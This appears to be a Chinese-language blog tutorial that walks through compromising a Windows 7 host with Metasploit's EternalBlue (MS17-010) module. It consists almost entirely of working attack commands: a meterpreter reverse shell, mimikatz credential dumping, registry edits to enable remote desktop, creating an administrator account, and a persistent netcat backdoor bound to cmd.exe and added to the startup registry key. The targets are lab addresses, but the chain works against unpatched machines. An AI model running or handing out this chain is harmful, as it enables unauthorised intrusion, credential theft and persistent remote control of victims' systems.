一、 啟動msf之前的准備工作
root@kali:~#service postgresql start
root@kali:~#msfdb init
root@kali:~#msfconsole
二、 查看是否存在漏洞
msf >search ms17_010尋找所需模塊
msf >use auxiliary/scanner/smb/smb_ms17_010(加載掃描exp)
msf >set RHOSTS 192.168.92.129(設置被掃描IP)
msf >run(進行掃描,觀察是否存在該漏洞)
三、 漏洞攻擊
msf >use exploit/windows/smb/ms17_010_eternalblue (加載攻擊模塊)
msf > set RHOST 192.168.92.129(被攻擊機IP)
msf >set LHOST 192.168.92.132(設置本地IP)
msf >set LPORT 4444(設置連接端口)
msf >set payload windows/x64/meterpreter/reverse_tcp(配置回鏈方式)
msf >show options(查看配置相關信息)
msf >run(或者exploit,開始攻擊)
四、 攻擊成功!查看系統信息
meterpreter>sysinfo爆出系統信息
meterpreter>screenshot截屏,截屏后的圖片存放在/root/中
meterpreter>upload xx.exe C:\yyy\xxx.exe 這條命令可以上傳任意文件,后面會用到,上傳后門
meterpreter >shell 進入靶機cmd
如果連接到windows的shell顯示亂碼,使用如下命令
C:\Windows\system32>chcp 65001
五、 爆破密碼的過程,使用mimikatz
首先查看是否開啟3389端口,如果沒有則使用以下命令在cmd中開啟
C:\Windows\system32>netstat –ano 觀察3389端口是否開啟
C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
C:\Windows\system32>exit
meterpreter > load mimikatz
meterpreter > msv <獲取的賬號信息是hash值>
meterpreter > ssp <獲取的賬號信息是明文信息>
meterpreter > wdigest <讀取內存中存放的賬號密碼明文信息>
meterpreter > kerberos <和上面類似>
六、 連接win7的遠程桌面
重新打開一個命令界面
root@kali:~# rdesktop 192.168.92.129
輸入剛才破解的用戶名和密碼。如果不使用破解的用戶名和密碼也可以自己創建一個用戶名和密碼,但必須賦予創建的賬號相關權限
七、 創建賬號的兩種方法
1.通過shell進入靶機,在靶機里創建用戶賬號,然后添加到administrators用戶組,使其也具有administrators權限,最后查看是否是管理員權限
meterpreter > shell
C:\Windows\system32>net user test1 123456 /add
C:\Windows\system32>net localgroup administrators test1 /add
C:\Windows\system32>net user test1
2.利用msf的post后滲透攻擊模塊,直接在meterpreter下創建,這種創建的賬號直接就是administrators權限。
meterpreter > run post/windows/manage/enable_rdp
meterpreter > run post/windows/manage/enable_rdp USERNAME=test1 PASSWORD=12345
八、 上傳后門nc
(ps:如果格式不正確,放在記事本里調一下格式或者換行,正常來說是沒有換行的)
首先開啟win7主機默認共享,以便遠程執行命令
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
開放win7 443端口
C:\Windows\system32> netsh firewall add portopening TCP 443 "test" ENABLE
上傳瑞士軍刀nc.exe到windows主機上
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
將nc添加至啟動項
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
開放win7 443端口
C:\Windows\system32>netsh firewall add portopening TCP 443 ENABLE
重啟win7並測試后門
C:\Windows\system32>shutdown -r -f -t 0
重新打開一個會話界面測試后門,如果能直接進入靶機的shell,則說明后門上傳成功,以后可以直接通過這條命令連接靶機
root@kali:~# nc -v 192.168.72.128 443
如果覺得還行,點點關注